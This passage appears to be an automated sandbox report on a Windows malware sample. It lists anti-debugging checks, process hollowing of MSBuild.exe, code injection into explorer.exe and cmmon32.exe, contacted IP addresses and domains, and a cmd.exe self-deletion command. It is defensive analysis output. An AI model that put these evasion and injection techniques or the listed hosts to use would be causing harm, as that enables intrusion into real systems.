          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_0103BC2C mov eax, dword ptr fs:[00000030h]3_2_0103BC2C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_0103A44B mov eax, dword ptr fs:[00000030h]3_2_0103A44B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_0109C450 mov eax, dword ptr fs:[00000030h]3_2_0109C450
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_0109C450 mov eax, dword ptr fs:[00000030h]3_2_0109C450
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_0102746D mov eax, dword ptr fs:[00000030h]3_2_0102746D
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_0103AC7B mov eax, dword ptr fs:[00000030h]3_2_0103AC7B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_0103AC7B mov eax, dword ptr fs:[00000030h]3_2_0103AC7B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_0103AC7B mov eax, dword ptr fs:[00000030h]3_2_0103AC7B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_0103AC7B mov eax, dword ptr fs:[00000030h]3_2_0103AC7B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_0103AC7B mov eax, dword ptr fs:[00000030h]3_2_0103AC7B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_0103AC7B mov eax, dword ptr fs:[00000030h]3_2_0103AC7B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_0103AC7B mov eax, dword ptr fs:[00000030h]3_2_0103AC7B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_0103AC7B mov eax, dword ptr fs:[00000030h]3_2_0103AC7B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_0103AC7B mov eax, dword ptr fs:[00000030h]3_2_0103AC7B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_0103AC7B mov eax, dword ptr fs:[00000030h]3_2_0103AC7B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_0103AC7B mov eax, dword ptr fs:[00000030h]3_2_0103AC7B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_0101849B mov eax, dword ptr fs:[00000030h]3_2_0101849B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010C4496 mov eax, dword ptr fs:[00000030h]3_2_010C4496
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010C4496 mov eax, dword ptr fs:[00000030h]3_2_010C4496
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010C4496 mov eax, dword ptr fs:[00000030h]3_2_010C4496
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010C4496 mov eax, dword ptr fs:[00000030h]3_2_010C4496
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010C4496 mov eax, dword ptr fs:[00000030h]3_2_010C4496
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010C4496 mov eax, dword ptr fs:[00000030h]3_2_010C4496
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010C4496 mov eax, dword ptr fs:[00000030h]3_2_010C4496
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010C4496 mov eax, dword ptr fs:[00000030h]3_2_010C4496
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010C4496 mov eax, dword ptr fs:[00000030h]3_2_010C4496
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010C4496 mov eax, dword ptr fs:[00000030h]3_2_010C4496
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010C4496 mov eax, dword ptr fs:[00000030h]3_2_010C4496
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010C4496 mov eax, dword ptr fs:[00000030h]3_2_010C4496
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010C4496 mov eax, dword ptr fs:[00000030h]3_2_010C4496
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010D8CD6 mov eax, dword ptr fs:[00000030h]3_2_010D8CD6
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010C14FB mov eax, dword ptr fs:[00000030h]3_2_010C14FB
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_01086CF0 mov eax, dword ptr fs:[00000030h]3_2_01086CF0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_01086CF0 mov eax, dword ptr fs:[00000030h]3_2_01086CF0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_01086CF0 mov eax, dword ptr fs:[00000030h]3_2_01086CF0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010D070D mov eax, dword ptr fs:[00000030h]3_2_010D070D
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010D070D mov eax, dword ptr fs:[00000030h]3_2_010D070D
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_0103A70E mov eax, dword ptr fs:[00000030h]3_2_0103A70E
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_0103A70E mov eax, dword ptr fs:[00000030h]3_2_0103A70E
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_0102F716 mov eax, dword ptr fs:[00000030h]3_2_0102F716
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_0109FF10 mov eax, dword ptr fs:[00000030h]3_2_0109FF10
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_0109FF10 mov eax, dword ptr fs:[00000030h]3_2_0109FF10
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_01004F2E mov eax, dword ptr fs:[00000030h]3_2_01004F2E
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_01004F2E mov eax, dword ptr fs:[00000030h]3_2_01004F2E
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_0103E730 mov eax, dword ptr fs:[00000030h]3_2_0103E730
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_0102B73D mov eax, dword ptr fs:[00000030h]3_2_0102B73D
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_0102B73D mov eax, dword ptr fs:[00000030h]3_2_0102B73D
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_0101EF40 mov eax, dword ptr fs:[00000030h]3_2_0101EF40
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_0101FF60 mov eax, dword ptr fs:[00000030h]3_2_0101FF60
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010D8F6A mov eax, dword ptr fs:[00000030h]3_2_010D8F6A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_01018794 mov eax, dword ptr fs:[00000030h]3_2_01018794
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_01087794 mov eax, dword ptr fs:[00000030h]3_2_01087794
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_01087794 mov eax, dword ptr fs:[00000030h]3_2_01087794
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_01087794 mov eax, dword ptr fs:[00000030h]3_2_01087794
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010437F5 mov eax, dword ptr fs:[00000030h]3_2_010437F5
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_0100C600 mov eax, dword ptr fs:[00000030h]3_2_0100C600
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_0100C600 mov eax, dword ptr fs:[00000030h]3_2_0100C600
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_0100C600 mov eax, dword ptr fs:[00000030h]3_2_0100C600
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_01038E00 mov eax, dword ptr fs:[00000030h]3_2_01038E00
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010C1608 mov eax, dword ptr fs:[00000030h]3_2_010C1608
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_0103A61C mov eax, dword ptr fs:[00000030h]3_2_0103A61C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_0103A61C mov eax, dword ptr fs:[00000030h]3_2_0103A61C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_0100E620 mov eax, dword ptr fs:[00000030h]3_2_0100E620
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010BFE3F mov eax, dword ptr fs:[00000030h]3_2_010BFE3F
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_01017E41 mov eax, dword ptr fs:[00000030h]3_2_01017E41
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_01017E41 mov eax, dword ptr fs:[00000030h]3_2_01017E41
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_01017E41 mov eax, dword ptr fs:[00000030h]3_2_01017E41
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_01017E41 mov eax, dword ptr fs:[00000030h]3_2_01017E41
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_01017E41 mov eax, dword ptr fs:[00000030h]3_2_01017E41
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_01017E41 mov eax, dword ptr fs:[00000030h]3_2_01017E41
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010CAE44 mov eax, dword ptr fs:[00000030h]3_2_010CAE44
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010CAE44 mov eax, dword ptr fs:[00000030h]3_2_010CAE44
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_0101766D mov eax, dword ptr fs:[00000030h]3_2_0101766D
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_0102AE73 mov eax, dword ptr fs:[00000030h]3_2_0102AE73
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_0102AE73 mov eax, dword ptr fs:[00000030h]3_2_0102AE73
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_0102AE73 mov eax, dword ptr fs:[00000030h]3_2_0102AE73
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_0102AE73 mov eax, dword ptr fs:[00000030h]3_2_0102AE73
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_0102AE73 mov eax, dword ptr fs:[00000030h]3_2_0102AE73
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_0109FE87 mov eax, dword ptr fs:[00000030h]3_2_0109FE87
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010D0EA5 mov eax, dword ptr fs:[00000030h]3_2_010D0EA5
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010D0EA5 mov eax, dword ptr fs:[00000030h]3_2_010D0EA5
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010D0EA5 mov eax, dword ptr fs:[00000030h]3_2_010D0EA5
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010846A7 mov eax, dword ptr fs:[00000030h]3_2_010846A7
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_01048EC7 mov eax, dword ptr fs:[00000030h]3_2_01048EC7
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010BFEC0 mov eax, dword ptr fs:[00000030h]3_2_010BFEC0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010336CC mov eax, dword ptr fs:[00000030h]3_2_010336CC
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010D8ED6 mov eax, dword ptr fs:[00000030h]3_2_010D8ED6
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010316E0 mov ecx, dword ptr fs:[00000030h]3_2_010316E0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010176E2 mov eax, dword ptr fs:[00000030h]3_2_010176E2
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process queried: DebugPort
          Source: C:\Windows\SysWOW64\cmmon32.exe Process queried: DebugPort
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 3_2_0040ACF0 LdrLoadDll, 3_2_0040ACF0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exe Memory allocated: page read and write | page guard

          HIPS / PFW / Operating System Protection Evasion

          Source: C:\Windows\explorer.exeNetwork Connect: 156.242.168.70 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.desipizza.uk
          Source: C:\Windows\explorer.exeDomain query: www.hblcfl.com
          Source: C:\Windows\explorer.exeDomain query: www.anbietertest.com
          Source: C:\Windows\explorer.exeNetwork Connect: 45.195.140.44 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 213.171.195.105 80Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection unmapped: C:\Windows\SysWOW64\cmmon32.exe base address: 1030000Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: unknown target: C:\Windows\SysWOW64\cmmon32.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: unknown target: C:\Windows\SysWOW64\cmmon32.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\cmmon32.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read writeJump to behavior
          Source: C:\Windows\SysWOW64\cmmon32.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread APC queued: target process: C:\Windows\explorer.exeJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread register set: target process: 3324Jump to behavior
          Source: C:\Windows\SysWOW64\cmmon32.exeThread register set: target process: 3324Jump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeJump to behavior
          Source: C:\Windows\SysWOW64\cmmon32.exe
          Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
          Source: explorer.exe, 00000004.00000003.537796204.00000000086B6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.568505299.0000000000ED0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000002.573217312.0000000005910000.00000004.00000001.00020000.00000000.sdmp
          Binary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000004.00000002.568505299.0000000000ED0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000000.340666473.0000000000ED0000.00000002.00000001.00040000.00000000.sdmp
          Binary or memory string: uProgram Manager*r
          Source: explorer.exe, 00000004.00000002.568505299.0000000000ED0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000000.340666473.0000000000ED0000.00000002.00000001.00040000.00000000.sdmp
          Binary or memory string: Progman
          Source: explorer.exe, 00000004.00000002.568505299.0000000000ED0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000000.340666473.0000000000ED0000.00000002.00000001.00040000.00000000.sdmp
          Binary or memory string: Progmanlock
          Source: explorer.exe, 00000004.00000000.339990008.0000000000878000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.568119582.0000000000878000.00000004.00000020.00020000.00000000.sdmp
          Binary or memory string: ProgmanLoc*U
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exe
          Queries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exe VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exe
          Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exe
          Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exe
          Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformationJump to behavior
